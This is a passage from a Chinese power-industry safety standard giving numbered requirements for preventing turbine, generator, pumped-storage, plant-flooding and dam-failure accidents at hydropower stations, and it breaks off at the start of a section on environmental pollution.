对调速系统油质进行定期化验和颗粒度超标检查,加强对调速器滤油 器的维护保养工作,寒冷地区电站应做好调速系统及集油槽透平油的保温措施, 防止油温低、粘度增大,导致调速器动作不灵活,在油质指标不合格的情况下, 严禁机组启动。 23.1.7 工作闸门(主阀)应具备动水关闭功能,导水机构拒动时能够动水关 闭。具备自动关闭条件的工作闸门(主阀),应保证在最大流量下动水关闭时, 关闭时间不超过机组在最大飞逸转速下允许持续运行的时间。 23.1.8 进口工作门(事故门)应定期进行落门试验。水轮发电机组设计有快 速门的,应在中控室能进行人工紧急关闭,并定期进行落门试验。设计有联动功 能的,应在落门试验时同步验证联动性能。 23.1.9 设置完善的剪断销剪断(破断连杆、导叶摩擦装置)、调速系统低油 压、低油位、电气和机械过速等保护装置。过速保护装置应定期检验,并正常投 入。对机械过速、事故停机时剪断销剪断(破断连杆破断)等保护在机组检修时 应进行传动试验。 23.1.10 机组过速保护的转速信号装置采用冗余配置,其输入信号取自不同 的信号源,转速信号器的选用应符合规程要求。 23.1.11 大中型水电站在水轮发电机组的保护和控制回路电压消失时发出报 警信号,对于有人值班的电站,当工作电源完全消失时,并网机组接力器行程应 保持当前位置不变,或采取关机保护原则;对于无人值班电站,当工作电源完全 消失时,调节系统可采取关机保护的原则。 23.1.12 机组A级检修时做好过速限制器的分解检查,保证机组过速时可靠 动作,防止机组飞逸。 23.1.13 电气和机械过速保护装置、自动化元件应定期进行检修、试验,以 确保机组过速时可靠动作。 23.2 防止水轮机损坏 209 23.2.1 防止水轮机过流及重要紧固部件损坏的重点要求 23.2.1.1 水电站规划设计中应重视水轮发电机组的运行稳定性,合理选择机 组参数,使机组具有较宽的稳定运行范围。水电站运行单位应全面掌握各台水轮 发电机组的运行特性,划分机组运行区域,并将测试结果作为机组运行控制和自 动发电控制(AGC)等系统运行参数设定的依据,电力调度机构应加强与水电 站的沟通联系,了解和掌握所调度范围水轮发电机组随水头、出力变化的运行特 性,优化机组的安全调度。 23.2.1.2 水轮发电机组设计制造时应重视机组重要连接紧固部件的安全性, 并说明重要连接紧固部件的安装、使用、维护要求。水电站运行单位应经常对水 轮发电机组重要设备部件(如水轮机顶盖紧固螺栓等)进行检查维护,结合设备 消缺和检修对易产生疲劳损伤的重要设备部件进行无损探伤,对已存在损伤的设 备部件要加强技术监督,对已老化和不能满足安全生产要求的设备部件要及时进 行更新。 23.2.1.3 水轮机导水机构必须设有防止导叶损坏的安全装置,包括装设剪断 销(破断连杆、导叶摩擦装置等)、导叶限位、导叶轴向调整和止推等装置。 23.2.1.4 水电站应安装水轮发电机组状态在线监测系统,对机组的运行状态 进行监测、记录和分析。对于机组振动、摆度突然增大超过标准的异常情况,应 立即停机检查,查明原因和处理合格后,方可按规定程序恢复机组运行。水轮机 在各种工况下运行时,应保证顶盖振动和机组轴线各处摆度不大于规定的允许 值。机组异常振动和摆度超过允许值应启动报警和事故停机回路。 23.2.1.5 水轮机桨叶接力器与操作机构连接螺栓应符合设计要求,经无损检 测合格,螺栓预紧力矩符合设计要求,止动装置安装牢固或点焊牢固。 23.2.1.6 水轮机的轮毂与主轴连接螺栓和销钉符合设计标准,经无损检测合 格,螺栓对称紧固,预紧力矩符合设计要求,止动装置安装或点焊牢固。 23.2.1.7 轴流转桨式水轮机桨叶接力器铜套、桨叶轴颈铜套、连杆铜套应符 合设计标准,铜套完好无明显磨损,铜套润滑油沟油槽完好,铜套与轴颈配合间 隙符合设计要求。 23.2.1.8 水轮机桨叶接力器、桨叶轴颈密封件应完好无渗漏,符合设计要求, 并保证耐压试验、渗漏试验及桨叶动作试验合格。 210 23.2.1.9 水轮机伸缩节所用螺栓符合设计要求,经无损检测合格,密封件完 好无渗漏,螺栓紧固无松动,预留间隙均匀并符合设计值。 23.2.1.10 灯泡贯流式、轴流转桨式水轮机转轮室与桨叶端部间隙符合设计 要求,桨叶轴向窜动量符合设计要求。混流式机组应检查上冠和下环之间的间隙 符合设计要求。 23.2.1.11 水轮机水下部分检修应检查转轮体与泄水锥的连接牢固可靠。 23.2.1.12 水轮机过流部件应定期检修,重点检查过流部件裂纹、磨损和汽 蚀,防止裂纹、磨损和大面积汽蚀等造成过流部件损坏。水轮机过流部件补焊处 理后应进行修型,保证型线符合设计要求,转轮大面积补焊或更换新转轮应做静 平衡试验。 23.2.1.13 水轮机所用紧固件、连接件、结构件应结合机组检修检查,针对 关键部位的紧固件、连接件和结构件,应执行所在行业相关规定;水轮机轮毂与 主轴等重要受力、振动较大的部位螺栓应在每次大修拆卸后更换,如需继续使用, 应开展全面无损检测,经有资质单位确认后方可继续使用,如经过高温加热拆卸 的,应全部更换。 23.2.1.14 水轮机转轮室及人孔门的螺栓、焊缝经无损检测合格,M32以上 螺栓应出具检测报告;螺栓紧固无松动,密封完好无渗漏。 23.2.1.15 水轮机真空破坏阀、补气阀应动作可靠,检修期间应对其进行检 查、维护和测试。 23.2.2 防止水轮机导轴承事故的重点要求 23.2.2.1 水轮机导轴承的间隙应符合设计要求,导轴承支撑方式宜采用球面 支撑,保证导瓦径向和切向调整灵活,轴承瓦面完好无明显磨损(巴氏合金瓦与 基材无分层褶皱),轴承瓦与主轴接触面积符合设计标准。 23.2.2.2 水轮机导轴承紧固螺栓应符合设计要求,经无损检测合格,对称紧 固,止动装置安装牢固或焊死。 23.2.2.3 新机制造时,制造厂应对机组各种运行条件下和典型转速点导轴承 油膜厚度、压力,轴承受力、强度等进行分析计算,并提交正式计算报告。 23.2.2.4 水轮机导轴承瓦出厂前应进行全面的性能试验和无损检测。对于巴 氏合金瓦,应对原材料开展硬度、金相组织抽样检测,并提交正式检测报告。 211 23.2.2.5 油润滑的水导轴承应定期检查油位、油色,油位应具备远方自动监 测功能,定期对运行中的油进行油质化验。 23.2.2.6 水润滑的水导轴承应保证水质清洁、水流畅通和水压正常,压力变 送器和示流器等装置工作正常。 23.2.2.7 水轮机导轴承测温元件和表计应保证显示正常,信号整定值正确。 对设置有外循环油系统的机组,其控制系统应正常工作。 23.2.2.8 水轮机顶盖排水系统完好,防止顶盖水位升高导致水导轴承油槽进 水。 23.2.2.9 水轮机出现异常运行工况可能损伤轴承时,应全面检查确认轴瓦完 好后,方可重新启动。 23.2.3 防止液压装置破裂、失压的重点要求 23.2.3.1 压力油罐油气比符合规程要求,对投入运行的自动补气阀定期检查 试验,保证自动补气工作正常。 23.2.3.2 压力油罐及其附件应定期检验检测合格,焊缝检测合格。压力容器 安全阀、压力开关和变送器定期校验,动作定值符合设计要求。 23.2.3.3 机组检修后对油泵启停定值、安全阀组定值进行校对并试验。油泵 运转应平稳,其输油量不小于设计值。 23.2.3.4 液压系统管路应经耐压试验合格,重要连接螺栓经无损检测合格, M32以上螺栓应出具检测报告,密封件完好无渗漏。 23.2.4 防止机组引水管路系统事故的重点要求 23.2.4.1 结合引水系统管路定检、设备检修检查,分析引水系统管路管壁锈 蚀、磨损情况,如有异常则及时采取措施处理,做好引水系统管路外表除锈防腐 工作。 23.2.4.2 定期检查伸缩节漏水、伸缩节螺栓紧固情况,如有异常及时处理。 23.2.4.3 及时监测拦污栅前后压差情况,出现异常及时处理。结合机组检修 定期检查拦污栅的完好性情况,防止进水口拦污栅损坏。 23.2.4.4 当引水管破裂时,事故门应能可靠关闭,并具备远方操作功能,在 检修时进行关闭试验。 23.2.4.5 一管(洞)多机的主进水阀设备检修吊出时,同流道相邻机组宜陪 212 停,不宜采用加装堵头等临时措施。若加装堵头,应对堵头的结构和刚强度专门 设计,并由第三方复核,确保在调保计算最不利工况不致发生堵头撕裂、焊缝断 裂等;严控制造工艺,材质成分、力学性能等应检测合格,所有焊缝应经射线检 测等无损检测合格;堵头出厂前应压力试验合格;严格按照审核合格的施工方案 进行堵头安装,并做好堵头运行过程中的状态监视。 23.3 防止水轮发电机重大事故 23.3.1 防止定子绕组端部松动引起相间短路的重点要求(参见10.1.1.1) 23.3.1.1 定子绕组在槽内应紧固,槽电位测试应符合要求。 23.3.1.2 定期检查定子绕组端部有无下沉、松动或磨损现象。 23.3.2 防止定子绕组绝缘损坏的重点要求 23.3.2.1 加强大型发电机环形接线、过渡引线绝缘检查,并定期按照相关标 准要求进行试验。 23.3.2.2 定期检查发电机定子铁芯螺杆紧力,发现铁芯螺杆紧力不符合出厂 设计值应及时处理。定期检查发电机硅钢片叠压整齐、无过热痕迹,发现有硅钢 片滑出应及时处理。(参见10. 2) 23.3.2.3 定期对抽水蓄能发电/电动机线棒端部与端箍相对位移与磨损进行 检查,发现端箍与支架连接螺栓松动应及时处理。 23.3.2.4 卧式机组应做好发电机风洞内及引线端部油、水引排工作,定期检 查发电机风洞内应无油气,机仓底部无积油、水。 23.3.3 防止转子绕组匝间短路的重点要求 加强运行中发电机的振动与无功出力变化情况监视。如果振动伴随无功变 化,则可能是发电机转子有严重的匝间短路。此时,首先控制转子电流,若振动 突然增大,应立即停运发电机。 23.3.4 防止发电机局部过热损坏的重点要求 23.3.4.1 制造、运输、安装及检修过程中,应防止焊渣或金属屑等微小异物 掉入定子铁芯通风槽内。 23.3.4.2 新投产机组或机组检修,都应检查定子铁芯压紧以及齿压指有无压 偏情况,特别是两端齿部,如发现有松驰现象,应进行处理后方可投入运行。对 铁芯绝缘有怀疑时,应进行铁损试验。 213 23.3.4.3 发电机出口、中性点引线连接部分应可靠,机组运行中应定期对励 磁变压器至静止励磁装置的分相电缆、静止励磁装置至转子滑环电缆、转子滑环 进行红外成像测温检查。 23.3.4.4 定期检查电制动刀闸动静触头接触情况,发现压紧弹簧松脱或单个 触指与其它触指不平行等问题应及时处理。 23.3.5 防止发电机机械损伤的重点要求 23.3.5.1 发电机主、辅设备保护装置应定期检验,并正常投入。机组重要运 行监视表计和装置失效或动作不正确时,严禁机组启动。机组运行中失去监控时, 应停机检查处理。 23.3.5.2 应尽量避免机组在振动负荷区或汽蚀区运行。 23.3.5.3 在发电机风洞内作业,应设专人把守发电机进人门,作业人员应穿 无金属的工作服、工作鞋,进入发电机内部前应全部取出禁止带入的物件,带入 物品应清点记录,工作时,不得踩踏线棒绝缘盒及连接梁等绝缘部件,也不得将 其作为安全带或绳索悬挂受力点,工作产生的杂物应及时清理干净,工作完毕撤 出时清点物品正确,确保无遗留物品。重点要防止螺钉、螺母、工具、铁屑等金 属杂物遗留在定子内部,特别应对端部线圈的夹缝、上下渐伸线之间位置作详细 检查。 23.3.5.4 大修时应对端部紧固件(如压板紧固的螺栓和螺母、支架固定螺母 和螺栓、引线夹板螺栓、汇流管所用卡板和螺栓等)紧固情况以及定子铁芯边缘 硅钢片有无断裂等进行检查。 23.3.6 防止发电机轴承损坏的重点要求 23.3.6.1 导轴承支撑方式宜采用球面支撑,保证导瓦径向和切向调整灵活。 23.3.6.2 新机制造时,制造厂应对机组各种运行条件下和典型转速点推力轴 承及导轴承油膜厚度、压力,轴承受力、强度等进行分析计算,并提交正式计算 报告。同时,应设计有防止油雾溢出油箱污染发电机定子、转子部件的措施。 23.3.6.3 机组推力轴瓦和导轴承瓦出厂前应进行全面的性能试验和无损检 测。对于巴氏合金瓦,应对原材料开展硬度、金相组织抽样检测,并提交正式检 测报告。 23.3.6.4 轴承油系统采用强迫外循环的冷却系统应配置两个相互独立的电 214 源,并采用自动切换装置。 23.3.6.5 润滑油油位应具备远方自动监测功能,并定时检查。定期对润滑油 进行化验,油质劣化应尽快处理。 23.3.6.6 带有高压油顶起装置的推力轴承应保证在高压油顶起装置失灵的 情况下,推力轴承不投入高压油顶起装置时安全停机无损伤。应定期对高压油顶 起装置进行检查试验,确保其处于正常工作状态。 23.3.6.7 高压注油系统出口压力监视应设压力变送器和压力开关,分别用于 监控系统远方监视和现地逻辑控制。 23.3.6.8 新机制造时,制造厂应提供机组各工况条件下的高压注油系统运行 压力计算保证值,并据此进行压力报警值整定。 23.3.6.9 安装过程中,高压注油泵出口安全阀整定值应不小于设备厂家计算 的在推力轴承瓦面高压油室所形成的使推力轴承镜板与推力瓦完全脱开的瞬时 冲击压力。 23.3.6.10 冷却水温、油温、瓦温监测和保护装置应准确可靠,并加强运行 监控。 23.3.6.11 机组出现异常运行工况可能损伤轴承时,应全面检查确认轴瓦完 好后,方可重新启动。 23.3.6.12 定期对轴承瓦进行检查,确认无脱壳、裂纹等缺陷,轴瓦接触面、 轴领、镜板表面光洁度应符合设计要求。对于巴氏合金轴承瓦,应定期检查合金 与瓦坯的接触情况,必要时进行无损探伤检测。 23.3.6.13 装设有轴电流(轴绝缘)保护装置的机组,轴电流(轴绝缘)保 护回路应正常投入,出现轴电流(轴绝缘)报警应及时检查处理,禁止机组无轴 电流(轴绝缘)保护运行。 23.3.7 防止水轮发电机部件松动的重点要求 23.3.7.1 水轮发电机风洞内应避免使用在电磁场下易发热材料或能被电磁 吸附的金属连接材料,否则应采取可靠的防护措施,且强度应满足使用要求。 23.3.7.2 旋转部件连接件应做好防止松脱措施,并定期进行检查。磁极引线、 磁极间连接、阻尼环和绝缘板等易受离心和疲劳影响部件应加强检查。发电机转 子风扇应安装牢固,叶片无裂纹、变形,引风板安装应牢固并与定子线棒保持足 215 够间距。 23.3.7.3 定子(含机座)、转子各部件、定子线棒槽楔等应定期检查。水轮 发电机机架固定螺栓、定子基础螺栓、定子穿芯螺栓和拉紧螺栓应紧固良好,机 架和定子支撑、转动轴系等承载部件的承载结构、焊缝、基础、配重块等应无松 动、裂纹、变形等现象。 23.3.7.4 定期检查水轮发电机机械制动系统,制动闸、制动环应平整无裂纹, 固定螺栓无松动,制动瓦磨损后应及时更换,制动闸及其供气、油系统应无发卡、 串腔、漏气和漏油等影响制动性能的缺陷。制动回路转速整定值应定期进行校验, 严禁高转速下投入机械制动;监控程序宜设置有高转速下闭锁投机械制动功能。 23.3.7.5 发电机所用紧固件、连接件、结构件应结合机组检修检查,针对关 键部位的紧固件、连接件、结构件,应执行所在行业相关规定;发电机转子与大 轴、发电机轴与水轮机轴等重要受力、振动较大的部位螺栓应在每次大修拆卸后 更换,如需继续使用,应开展全面无损检测,经有资质单位确认后方可继续使用, 如经过高温加热拆卸的,应全部更换。 23.3.8 防止发电机转子绕组接地故障的重点要求(参见10. 3.2.1、10. 3.2.3) 23.3.9 防止发电机非同期并网的重点要求(参见10.10.1) 23.3.10 防止励磁系统故障引起发电机损坏的重点要求 23.3.10.1 励磁调节器的运行通道发生故障时应能自动切换通道并投入运 行。严禁发电机在手动励磁调节下长期运行。在手动励磁调节运行期间,调节发 电机的有功负荷时应先适当调节发电机的无功负荷,以防止发电机失去静态稳定 性。 23.3.10.2 在电源电压偏差为+10%~-15%、频率偏差为+4%~-6%时,励磁控 制系统及其继电器、开关等操作系统均能正常工作。 23.3.10.3 励磁系统中两套励磁调节器的电压回路应相互独立,使用机端不 同电压互感器的二次绕组,防止其中一个短路引起发电机误强励。 23.3.10.4 励磁系统中两套励磁调节器的电流回路宜分别取自电流互感器不 同的二次绕组。 23.3.10.5 严格执行调度机构有关发电机低励限制和电力系统静态稳定器 (PSS)的定值要求。 216 23.3.10.6 自动励磁调节器的过励限制和过励保护的定值应在制造厂给定的 容许值内,并定期校验。 23.3.10.7 在机组启动、停机和其它试验过程中,应有机组低转速时切断发 电机励磁的措施。 23.4 防止抽水蓄能机组相关事故 23.4.1 防止机组飞逸的重点要求 23.4.1.1 新机组、改造机组投运前,机组A修或进行其他影响调速系统调节 性能的工作后,应通过单机甩负荷和过速试验。甩负荷试验应在额定负荷的25%、 50%、75%和100%下进行,验证水压上升率和转速上升率符合设计要求。 23.4.1.2 对于一管(洞)多机的新建电站,应结合电站电气主接线、现场实 际运行条件,在单机甩负荷之后,择机开展同一引水水道多机组同时发电甩负荷 试验,甩负荷试验应在额定负荷的100%下进行。试验后应进行过渡过程复核计 算,验证水压上升率和转速上升率符合设计要求。 23.4.1.3 新机组或改造机组投运前应进行水泵工况断电试验,验证压力钢管 和尾水管水压变化满足设计要求。 23.4.2 防止主轴密封、迷宫环损坏的重点要求 23.4.2.1 主轴密封、迷宫环技术供水管路应设计压力、流量监测装置,流量 监测装置应设越下限报警信号。 23.4.2.2 主轴密封、迷宫环应设置温度传感器,其中主轴密封温度测点不少 于3个。各温度测点应设两级越上限信号,其中一级越限作用于报警、二级越限 作用于报警和水力机械事故停机。 23.4.3 防止抽水蓄能电站上下库水位越限运行的重点要求 23.4.3.1 上/下水库应分别设置两套不同原理的水库水位测量装置。 23.4.3.2 上/下水库水位各测点应根据水工设施要求分别设置两级越上限和 两级越下限信号,其中一级越限作用于报警、二级越限作用于报警及自动停机。 23.4.3.3 每年应对水库水位各测点与水位标尺等进行对比校核。 23.4.4 防止静止变频器相关设备损坏的重点要求 23.4.4.1 静止变频器输入变压器严禁无保护运行。 23.4.4.2 静止变频器输入变压器及限流电抗器应选用短路试验合格的产品。 217 23.4.4.3 静止变频器输入及输出变压器为油浸式应定期进行油色谱分析。 23.4.5 防止主进水阀损坏的重点要求 23.4.5.1 主进水阀枢轴轴瓦设计应采用铜基镶嵌自润滑、双金属自润滑或其 它在同等运行条件下能够长期可靠运行的整体式轴瓦。枢轴轴瓦与阀体之间应设 有可靠固定方式确保不发生相对位移。 23.4.5.2 主进水阀紧急停机阀为失电动作的机组,控制电源应冗余配置,并 与其他回路隔离。 23.4.5.3 球阀活门和工作密封动作顺序应具有闭锁功能,宜采用液压回路和 控制逻辑双重闭锁。 23.4.5.4 主进水阀与尾闸应具有主进水阀全关后尾闸方可关闭、尾闸全开后 主进水阀方可开启的闭锁功能。 23.4.5.5 球阀工作密封投退腔压力、差压、工作密封位置、压力钢管压力及 球阀本体位移监测等信号应接入监控系统。 23.4.5.6 压力钢管、球阀及其附属管路、阀门、接头等设备设计选型时,强 度应满足机组发生水力自激振动情况下的安全裕度。压力钢管、球阀的压力监测 管路、隔离阀门应使用不锈钢材质,隔离阀门应采用球阀或针阀。 23.4.5.7 球阀设计上应有保证工作密封投退腔串压情况下投入腔压力始终 大于退出腔压力的措施。 23.4.5.8 新建电站在调试期间或全部机组投运后一年内,同一制造厂生产的 主进水阀应至少选取1台进行动水关闭试验,以全面验证主进水阀及其附属设备 性能。 23.4.5.9 主进水阀接力器连接管路设计为软管的,当软管达到设计使用寿命 时,应进行更换。更换的软管应有制造厂明确的使用寿命及更换条件。 23.4.5.10 应定期校验、调整主进水阀平压信号装置,确保平压信号有效时 两侧压差符合设计值。 23.4.5.11 配置有球阀的电站应在监控系统中设置水力自激振动报警判据。 23.4.6 防止水淹厂房的重点要求 23.4.6.1 在招标设计、输水道充水或首台机组启动前,设计单位应提交防水 淹厂房专题报告,结合电站设备实际,针对不同管路破裂引起的水淹厂房可能性, 218 复核电站排水能力及相关设备的可靠性。 23.4.6.2 电站中控室应配置紧急停机和紧急关闭上、下游水道事故闸门的可 靠装置,紧急停机和紧急关闭事故闸门回路设计应采用独立于电站监控系统的硬 布线(包括独立光缆),电源应独立提供。 23.4.6.3 主进水阀、调速器的控制回路应由交、直流双回路供电或两路完全 独立的直流供电,在控制回路电压消失的情况下具备“失电关闭”功能,即失电时 自动关闭主进水阀及导叶。 23.4.6.4 动力电源操作的事故闸门,应配置独立的应急电源,确保在地下厂 房交流电源全部丢失时闸门能正常下落。 23.4.6.5 与水库、压力钢管、蜗壳、尾水管等直接相连的管路、法兰及第一 道阀门应采用不锈钢材质。 23.4.6.6 地下或坝后式厂房各层逃生通道显著位置应装设逃生路线指示图, 逃生路线指示图应采用荧光材料制作,逃生通道应安装防护等级不低于IP67的应 急照明。 23.4.6.7 应急照明电源应分级和分高程设计和布置,并逐级逐层设置断路 器,以保证下层和下级电源遇水短路跳闸而不影响上层和上级电源供电。 23.4.6.8 应至少配置两套不同原理的厂房集水井水位监测装置及水位过高 报警装置。 23.4.6.9 对可能遭遇区间暴雨、尾水位超高倒灌等影响的孔洞、管沟、通道、 预留缺口等应设置拍门或挡板。 23.4.6.10 除另有规定外,当螺栓要求有预应力时,预紧力应不小于正常工 况和过渡工况下连接对象的最大工作荷载折算到螺栓轴向荷载的2.0倍,螺栓的 工作综合应力在正常工况和过渡工况下不大于螺栓材料屈服强度的2/3,在特殊 工况下不大于螺栓材料屈服强度的4/5。螺栓预紧过程中最大综合应力不得超过 材料屈服强度的7/8。 23.4.6.11 各水电厂应结合自身实际建立重要部位螺栓台账,重要部位螺栓 应做好原始位置状态标记并制定防止松动措施。 23.4.6.12 重要部位螺栓无损检测时宜同时进行超声波与磁粉检测;新购置 螺栓应提供螺栓材质、无损检测、硬度、力学性能等出厂试验报告。 219 23.4.6.13 压力钢管明管段应按照设计要求单独进行压力试验,主进水阀阀 体及前后的延伸段、伸缩节及其相连的所有阀门应进行压力试验。 23.4.6.14 应按照相关标准要求进行压力钢管及明管段管壁焊缝、壁厚、应 力、腐蚀检测。对与压力钢管直接连接的阀门和管路焊缝按照相关标准要求进行 无损检测。 23.4.6.15 一管(洞)多机的抽水蓄能机组,主进水阀设备检修吊出时,禁 止使用进水阀堵头作为临时措施,同一流道相邻机组应陪停,应排空引水管道, 并做好防止上水库进水闸门误开启的措施。 23.4.7 防止输水系统金属部件脱落的重点要求 23.4.7.1 水道系统内格栅应采用不锈钢材质,格栅应固定牢固。 23.4.7.2 闸门井通气孔孔盖应采用格栅式设计,宜采用整体结构并固定牢 固。 23.4.7.3 在闸门井或其通气孔内设计有爬梯的,爬梯应采用不锈钢材质;未 设计爬梯的,应在闸门井口或通气孔口设置软梯和防坠器的挂点。 23.4.8 防止特殊工况或极限工况运行设备损坏的重点要求 23.4.8.1 监控系统应设计有防止同一流道内不同机组同时抽水和发电的闭 锁功能。 23.4.8.2 机组在电气制动工况运行时禁止强励功能投入。 23.4.8.3 应尽量避免抽蓄机组超设计电量或设计利用小时数运行。因负荷调 整需求等原因必须运行时,应尽可能保障关键疲劳设备、易损设备定期检修或临 时检查需求,防止机组过疲劳受损。 23.4.8.4 机组不应在高振动区和低负荷不稳定区内长期投自动功率控制运 行。 23.4.8.5 高寒地区电站应尽可能调整运行检修策略,最大限度防止水库冰 冻。 24 防止垮坝、水淹厂房及厂房坍塌事故的重点要求 24.1 加强大坝、厂房设计 24.1.1 设计应充分考虑不利的工程地质、气象条件和地震、洪水、地质灾害 220 等自然灾害的影响,尽量避开不利地段,禁止在危险地段新建、扩建和改建工程。 设计应开展大坝、厂房周边安全风险评估,优先设计管控风险的工程措施。 24.1.2 大坝、厂房的安全监测设计应与主体工程同步设计、同步施工、同步 投入运行,监测项目和布置在符合水工建筑物监测设计规范基础上,应满足运行、 维护及检修要求。对坝高一百米以上的大坝或库容一亿立方米以上的大坝,应当 同步设计大坝安全在线监控系统。 24.1.3 大坝、厂房的设防标准应满足规范要求。大坝应有安全、可靠的泄洪 等设施,闸门启闭设备电源、闸门门后通气孔、防水淹厂房应急电源及视频监控 设备、水位监测设施等的设置和可靠性应满足要求。应配置独立可靠的大坝泄洪 闸门启闭应急电源或应急启闭装置。 24.1.4 厂房应设计可靠的正常及应急排水系统。 24.1.5 地面主厂房的安全出口不应少于两个,且应有1个直通室外。地下厂 房至少应有 2 个通至地面的安全出口。 24.1.6 设计应根据已运行电站出现的问题,统筹考虑水电站大坝和厂房等工 程问题的解决方案。设计单位应从保护设施、设备运行安全及维护方便等方面征 求运行单位意见。 24.2 落实大坝、厂房施工期防洪度汛措施 24.2.1 施工期项目建设单位应成立包含业主(建设)、勘察、设计、施工和 监理等参建单位的防洪度汛组织机构,明确各单位职责。 24.2.2 设计单位应于每年汛前提出工程度汛标准、工程形象面貌及度汛要 求。 24.2.3 大坝、厂房改(扩)建过程中应满足各施工阶段的防洪标准。 24.2.4 压力管道、蜗壳、尾水管道等过水系统充水或首台机组启动前,设计 单位应提交防水淹厂房专题报告。结合电站设备实际,针对厂内和厂内外连接管 路破裂以及伸缩节、进人门等严重渗漏引起的水淹厂房可能性,复核电站排水能 力及相关设备的可靠性。 24.2.5 施工期项目建设单位应组织编制满足工程度汛及施工要求的防洪度 汛方案,报相关部门审查后严格执行。 24.2.6 项目建设单位、施工单位应制定完善工程防洪应急预案,按要求组织 221 评审、审批、培训和演练,按规定报地方政府有关部门备案。 24.2.7 施工单位应单独编制监测设施施工方案,由项目建设单位组织设计、 监理、运行单位审查后实施。 24.2.8 项目建设单位应于汛前组织开展防汛检查,并对汛期可能存在的安全 风险进行辨识、分析和评估,制定管控措施,汛前落实到位。 24.2.9 施工单位应于汛前按设计要求和现场施工情况制定防汛措施,报监理 单位审批后成立防汛抢险队伍,配置必要的防汛物资,做好防洪抢险准备工作。 24.2.10 施工期应加强洪水、地震、地质灾害等自然灾害的监测预报和会商 研判,密切跟踪区域内雨情和水情动态,及时发布预报预警信息。 24.2.11 施工期应做好汛期防灾避险工作,预报有强降雨前应及时对截排水 系统等进行全面检查,加强施工区域的隐患排查治理和突发事件应急处置。 24.3 加强大坝、厂房日常运行管理 24.3.1 应办理大坝安全注册登记,针对注册检查提出的大坝安全监管意见制 定整改落实计划,并按期完成整改。 24.3.2 建立健全大坝运行安全组织体系和应急工作机制,加强大坝运行全过 程管理。汛期应建立主要负责人为第一责任人的防汛组织机构,以及与地方政府 和上下游单位的联动机制,成立防汛抢险队伍,明确防汛目标和防汛重点,强化 落实防汛岗位责任制。 24.3.3 制定并不断修订完善能够指导实际工作的防汛、检查、监测、运行维 护等制度规程,并严格执行;制订和完善大坝运行安全应急预案和防水淹厂房应 急预案,确保预案的科学性、针对性和可操作性。 24.3.4 做好大坝安全检查(日常巡查、专项检查、年度详查、定期检查和特 种检查)、监测、维护工作,对检查发现的问题及时整改;对异常监测数据应及 时分析、上报和采取措施;当发生地震、洪水、库水位骤升骤降、库水位低于死 水位或者其他影响大坝安全的异常情况时,应加强巡视检查,增加监测频次,并 进行分析;确保大坝处于良好状态。 24.3.5 做好发电、输水建筑物及附属设施的安全检查、监测、维护工作,定 期开展厂房和输水建筑物结构安全评估。 24.3.6 近厂坝区域发现有滑坡体及泥石流沟的,应每隔3~5年论证导致漫坝 222 或水淹厂房事故发生的可能性。对工程管理范围内可能危及大坝、厂房安全的地 质灾害风险区域设置监测设施,并纳入巡查和监测范围,及时分析监测成果,必 要时开展灾害评估和工程处置。 24.3.7 对影响大坝、灰坝、厂房安全的缺陷、隐患及水毁工程,应实施永久 性的工程措施,优先安排资金,抓紧进行处理。对已确认的病、险坝,应在规定 期限内完成补强加固处理,并制定险情预计和应急预案。病险坝除险加固方案要 专项设计、专项审查、专项施工和专项验收,隐患未消除前,应根据实际病险情 况,充分论证运行安全性,必要时采取降低水库运行水位等措施确保安全。 24.3.8 应认真开展汛前、汛中和汛后检查工作,明确防汛重点部位、薄弱环 节,有针对性地开展应急预案演练,并将检查报告及演练情况及时上报主管单位。 24.3.9 应按照有关规定,对大坝、发电输水系统、厂房建筑物、泄洪设备、 排水设施、消防设施及其供电电源等进行认真检查。泄洪设备应急电源汛前应进 行带负荷可靠性验证试验。闸门操作控制系统(含远程)应结合检修进行检查和 可靠性验证试验。既要检查厂房外部、上下游防洪墙的防汛措施,也要检查厂房 内部及厂房内外连接管路、闸(阀)门、堵头的防水淹厂房措施,厂房内部重点 应对供排水系统、消防水系统、廊道、尾水进人孔、水轮机顶盖、堵头(含检修 期间的临时封堵装置)等部位进行检查和监视。定期验证防水淹厂房停机保护措 施及运行监控系统的可靠性。 24.3.10 汛前应做好防止水淹厂房、廊道、泵房、变电站、进厂铁(公)路 以及其他生产、生活设施的可靠防范措施,特别确保地处河流附近低洼地区、水 库下游地区、河谷地区排水畅通,防止河水倒灌和暴雨造成水淹。 24.3.11 汛前备足必要的防洪抢险器材、物资,并对其定期进行检查、检验 和试验,确保物资的良好状态。确保有足够的防汛资金保障,并建立防汛物资保 管、更新、使用等专项管理制度。 24.3.12 在重视防御江河洪水灾害的同时,应落实防御和应对上游水库垮坝、 下游尾水顶托及局部暴雨造成的厂坝区山洪、支沟洪水、厂区内部涝水的各项应 急措施。对于滨海地区可能受到海水潮汐作用影响的厂房,应制定防极端高潮位 和海啸的应急措施。 24.3.13 完善水雨情自动测报系统,广泛收集气象、水文信息,充分利用共 223 享的水情信息,加强水情测报和洪水预报,确保洪水预报精度。加强对水雨情自 动测报系统的维护,每年汛前开展专项检查,确保设备、系统正常运行和水情数 据准确可靠。 24.3.14 应严格执行批准的汛期调度运用计划,不得擅自在汛限水位以上蓄 水运行。汛限水位以上防洪库容调度运用,应按照水行政主管部门或流域管理机 构(防汛指挥部门)下达的防洪调度指令执行。 24.3.15 强化水电厂水库运行管理,应根据批准的调洪方案和有防洪调度权 限的水行政主管部门和流域管理机构的指令进行调洪,严格按照规程操作闸门。 如遇特大洪水或其他严重威胁大坝安全的事件,在无法接到调度指令时,应按照 批准的应急调度方案,采取措施确保大坝安全,同时采取一切可能的途径通知地 方政府及相关单位。当水库发生特大洪水后,应对水库的防洪能力进行复核。多 泥沙水库,应严格执行拉沙调度方案,防止淤堵泄洪设施和侵占调洪库容。 24.3.16 加强维护检修改造过程的防汛和安全管理,辨识危险源、评估安全 风险并采取切实可靠的管控措施。检修期间各类临时挡水、封堵设施应按规定组 织专项论证、专项设计、专项审查、专项施工、专项验收。 24.3.17 汛期应加强防汛值班,值班人员应具有相应的业务知识和技能,并 落实汛期24小时值班和领导带班制度。 24.3.18 及时掌握和上报有关防汛信息。防汛抗洪中发现异常现象和不安全 因素时,应及时采取措施,并报告上级主管部门和地方政府。 24.3.19 汛期后应及时对存在的隐患和问题进行整改,并及时进行防汛总结, 应及时将防汛总结上报主管单位。 25 防止重大环境污染事故的重点要求 25.1 严格执行环境影响评价制度与环保“三同时”原则 25.1.1 环保设施应当与主体工程同时设计、同时施工、同时投入使用,应符 合经批准的环境影响评价文件的要求。应加强对环保设施运维管理,确保环保设 施正常运行,环保指标应达到设计标准和国家及地方排放标准的要求。 25.1.2 